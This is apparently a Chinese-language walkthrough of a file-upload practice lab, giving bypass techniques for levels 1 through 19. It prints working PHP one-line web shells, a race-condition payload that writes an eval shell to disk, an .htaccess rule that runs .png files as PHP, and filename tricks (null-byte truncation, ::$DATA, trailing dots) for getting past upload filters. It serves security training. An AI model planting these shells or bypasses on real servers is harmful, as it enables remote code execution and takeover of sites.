WebShell
一句话木马:
<?php @eval($_POST['a'])?>
<?php @system($_POST['a'])?>
第一关(删除前端js校验)
删除return checkFile()
data:image/s3,"s3://crabby-images/871cc/871cc368b424e4f4f2110226f08edabfcfb81959" alt=""
就能上传成功
data:image/s3,"s3://crabby-images/1ac72/1ac72cebd20593c5c5bb63f2a76bbdae9f705fef" alt=""
data:image/s3,"s3://crabby-images/a0968/a096837ecf82a80c77fbf86f558ac611ced18d27" alt=""
第二关(抓包文件类型校验)
BP抓包修改后缀
data:image/s3,"s3://crabby-images/08ead/08ead7c0c3fe378e84fe42008a9f1f4ccaf08121" alt=""
改为2.php后放行
data:image/s3,"s3://crabby-images/ffc55/ffc55e0979095b12f79664d3f8c7e647064d4c77" alt=""
data:image/s3,"s3://crabby-images/c7368/c7368f14e3694650fcd02b98ba093f1ba0b815d6" alt=""
第三关(上传php同种类型的不同后缀)
根据源码发现这关的黑名单不太严谨,我们就可以使用php同种类型的不同后缀
data:image/s3,"s3://crabby-images/e14b3/e14b3b9b7a2e522a56c6384b2b282d29e9f88bc7" alt=""
data:image/s3,"s3://crabby-images/63fc3/63fc35a31ca13fca93a8155ad749c6feb6e51028" alt=""
后缀加个3 放行
第四关(双上传)
根据源码发现这些后缀的都无法上传,这时候就要用到.htaccess文件上传了
data:image/s3,"s3://crabby-images/53689/536896ede5af0dc4b487c1536ed2190236b2282c" alt=""
上传.htaccess配置文件
AddType application/x-httpd-php .png
把我们的木马文件后缀修改为png
data:image/s3,"s3://crabby-images/3ace4/3ace404327150935aea325557f5af678f7c46136" alt=""
第五关(大小写绕过)
根据源码发现这关没有过滤大小写
data:image/s3,"s3://crabby-images/3fa89/3fa8964f5a1411a59950dd7e97a5853fe6e87b39" alt=""
data:image/s3,"s3://crabby-images/7751e/7751ec5d1ebe27689c779796dda18d67d5ac12a6" alt=""
就可以上传成功了
第六关(空格绕过)
根据源码发现这关没有过滤首尾空格
data:image/s3,"s3://crabby-images/bde7e/bde7ebab73b08568c80c94706ab6bfd79e830732" alt=""
在文件后面添加一个空格就可以上传成功了
data:image/s3,"s3://crabby-images/b5fcd/b5fcd4a097bd910e1f262a6944aa79a5701f56e8" alt=""
data:image/s3,"s3://crabby-images/58bbe/58bbedb9f88191d9b8f003252167be7166178060" alt=""
第七关(点绕过)
根据源码发现这关没有过滤文件末尾的点
data:image/s3,"s3://crabby-images/d7539/d75391cdb6a9eb0bc4694ff3095d88c8eeb0c78a" alt=""
抓包修改文件名,在文件末尾加一个点,就可以上传成功
data:image/s3,"s3://crabby-images/072c1/072c11a97e4590800049b3bf0c7ef28378e78355" alt=""
data:image/s3,"s3://crabby-images/b423c/b423cdef6adba60ce6dd77161ec56366bcc62e63" alt=""
第八关(::$DATA绕过)
根据源码发现这关没有过滤::$DATA
data:image/s3,"s3://crabby-images/200de/200debc5c37c504c9a9fcce603b6db47e8262f60" alt=""
在文件末尾加上::$DATA就可以成功上传
data:image/s3,"s3://crabby-images/32296/32296959a17c060cac2c1516fb846281f3d26cfe" alt=""
data:image/s3,"s3://crabby-images/cb02f/cb02fad39b891968635e2b6edc75852df83b26da" alt=""
第九关(点空格点绕过)
根据源码发现这关把我们之前的方式都过滤了
data:image/s3,"s3://crabby-images/715a4/715a470dd7a128dc038632efcc07c69d4890bebb" alt=""
我们可以在文件尾部加上点空格点(. .)就可以成功上传
data:image/s3,"s3://crabby-images/a55c7/a55c77235ee13a11b2dc938a118cc42161cc9557" alt=""
data:image/s3,"s3://crabby-images/d1be4/d1be4578629c89ea05f94f248a58f24e7575beb1" alt=""
第十关(重复写绕过)
根据源码发现只有一个黑名单验证
data:image/s3,"s3://crabby-images/ba290/ba290b065f7d34e798c9b565eb36d4335b105be8" alt=""
我们只要把文件后缀改成.pphphp就可以成功上传
data:image/s3,"s3://crabby-images/f0997/f0997f5f120fb4394622384bc58dee2a7adcf81b" alt=""
data:image/s3,"s3://crabby-images/bf29c/bf29cd8ebb6f18bfb7ae987260242068df96ec23" alt=""
第十一关(get %00截断绕过)
根据源码发现是一个白名单上传,它只允许上传它给定的后缀名,关键的代码是这里;save_path是一个可控变量
data:image/s3,"s3://crabby-images/43724/43724e7275e08419db493b93e1e831fcdbb3afaa" alt=""
在这里添加/12.php%00截断就可以上传成功了
data:image/s3,"s3://crabby-images/f0cb7/f0cb7332c69036e8c49ee9d4b536e4d3d618eef9" alt=""
data:image/s3,"s3://crabby-images/c2c29/c2c293ea6ade930a53700ea7bdd039d60eec67bb" alt=""
第十二关(post %00截断绕过)
跟十一关是一样的,只不过换成了POST;这关没有环境是不行的
data:image/s3,"s3://crabby-images/5c8a8/5c8a89ff228f4835fe8b1b555cb938635e09c1cb" alt=""
把%00进行编码
data:image/s3,"s3://crabby-images/5b625/5b6254994a8505666b2016687c6b6cf2e65c258f" alt=""
data:image/s3,"s3://crabby-images/00def/00def9c8562d9ce2d278b7e655a941a332c394ed" alt=""
第十三关(文件包含图片马绕过(图片马单靠自己没用,需要一个有文件包含漏洞的php文件将图片马包含到自己的页面上))
1.png/b+13.php 2.png
data:image/s3,"s3://crabby-images/6d20d/6d20d14faa601028777654ffcda00fbe67d8509d" alt=""
data:image/s3,"s3://crabby-images/451b8/451b81791d15d6a9916795302c8aee17d0b5b741" alt=""
把我们制作好的图片马上传,点击在信标签打开图片就可看到我们图片的名称
data:image/s3,"s3://crabby-images/abea0/abea02cddccfebab16b90da10eab3744ce8921b1" alt=""
在靶场的文件中有一个include.php
data:image/s3,"s3://crabby-images/926c6/926c666400b9597192c4704aedf0d12196d03f15" alt=""
在include.php后面跟上参数和路径就能访问我们的图片马
data:image/s3,"s3://crabby-images/9e456/9e45632b8d82d461b3b7311f4e79d2046ed7c3f7" alt=""
第十四关(文件包含图片马绕过 同13)
直接上传我们的图片马
data:image/s3,"s3://crabby-images/0dee8/0dee8eed26dd562d212b208dc8ee4ac3a8e927a4" alt=""
第十五关(文件包含图片马绕过 同13)
十五关需要一个模块,在小皮里面打开就可
data:image/s3,"s3://crabby-images/27305/2730533d24b90b8c6a63aa3a3a0f0144098cf467" alt=""
data:image/s3,"s3://crabby-images/eee34/eee34da6c3037afe10a2528a509f8fd8f1be884b" alt=""
直接传之前的图片马就行
第十六关(文件包含二次渲染专用图绕过)
这一关会对我们的图片打散进行二次渲染
data:image/s3,"s3://crabby-images/6756b/6756b68c4c9296bdab0fdfa3d78a7e850a9962bc" alt=""
专用二次渲染图片;上传直接就可以成功
data:image/s3,"s3://crabby-images/71292/7129227741fa0d4883a10d518674262112c40148" alt=""
第十七关(抓包爆破条件竞争)
根据源码发现,这关我们上传的php文件是上传之后才被删除
data:image/s3,"s3://crabby-images/bd68e/bd68e777b57de8e8999ea85323fcf37aee75c837" alt=""
我们这关需要写一个生成新的php文件并把我们的一句话写进去
<?php fputs(fopen('qs.php','w'),'<?php @eval($_POST["cmd"]);?>'); ?>
利用BP抓包发送到攻击模块;清掉所有payload
data:image/s3,"s3://crabby-images/a40c5/a40c5fb54ce0778dd0acb1b134249f51d85f2322" alt=""
选择Null和无限重复就可以开始攻击
data:image/s3,"s3://crabby-images/fcb10/fcb1034c8774002b8083c9fd3f0567691ce5b080" alt=""
我们去一直访问1.php直到访问成功就是写进来了
或者去目录下面看
data:image/s3,"s3://crabby-images/88f87/88f87b17dc69c17f41cba8564ec1e52265e6af61" alt=""
第十八关(上传二次渲染的图片马 文件包含漏洞)
还是把我们二次渲染的图片马上传就行
data:image/s3,"s3://crabby-images/25131/2513148cfcf45f07a438014ad349d59032918e21" alt=""
第十九关(文件名命名规范)
根据源码发现有move_uploaded_file()这样一个函数,它有一个特性,会忽略到文件末尾的/.
抓包之后可以看见多了保存名称,没有对上传的文件做判断,只对用户输入的文件名做判断。
data:image/s3,"s3://crabby-images/72c85/72c8531ffa31d08ba3a27f8026375de8d42a87f7" alt=""
在文件末尾加上/.就可以成功上传
data:image/s3,"s3://crabby-images/5e444/5e444b9da140164023510e17d067b62bcb30fa86" alt=""